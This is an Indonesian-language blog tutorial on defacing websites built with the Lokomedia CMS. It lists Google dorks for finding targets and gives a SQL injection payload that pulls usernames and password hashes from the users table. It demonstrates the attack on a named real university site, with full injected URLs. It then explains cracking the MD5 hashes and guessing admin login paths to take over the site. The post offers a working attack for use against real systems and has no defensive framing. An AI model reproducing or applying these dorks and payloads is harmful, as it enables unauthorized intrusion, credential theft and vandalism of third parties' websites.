Deface Poc SQL Lokomedia

Dikesempatan kali ini mimin mau ngasih tau tutorial deface poc SQL Lokomedia caranya cukup mudah loh, yu simak....

Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
intext:lokomedia inurl:statis- ext:html
(Kembangkan lagi agar dapat yang perawan)

Exploit : 'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+

  • Kalian search di google dengan dork diatas
  • Cari web yang bisa dientot :v
  • Kalo sudah nemu tinggal klik
  • Disini saya sudah punya live target ya 
  • Nah sekarang tinggal cara penempatan exploit
  • Ini web target saya
http://iad.unmul.ac.id/statis-1-profil.html
  • Setelah itu tinggal kita masukin Exploit nya seletah angka 1 
  • Caranya gimana?
  • Seperti ini
http://iad.unmul.ac.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
  • Kalo vuln nanti akan muncul user sama passwordnya di title
  • Kalo mau lebih jelas kita tambahkan view-source: didepan link
  • Seperti ini :
view-source:http://iad.unmul.ac.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

  • Nanti tampilannya seperti ini
  • User/passnya di bagian <title>
  • Itukan passwordnya masih berbentuk hash MD5 kalian crack dulu cari di google banyak tempat cracknya
  • Setelah tau password aslinya kalian tinggal cari admin loginnya
  • Biasanya
/admin
/login.html
/admin/login.html
  • Yang lain use your brain :v
Cukup sekian tutorial dari saya mohon maaf bila ada kesalahan mimin lagi ngantuk :v dan jangan lupa untuk share ke teman-teman kalian:)

Post a Comment

0 Comments

Iklanku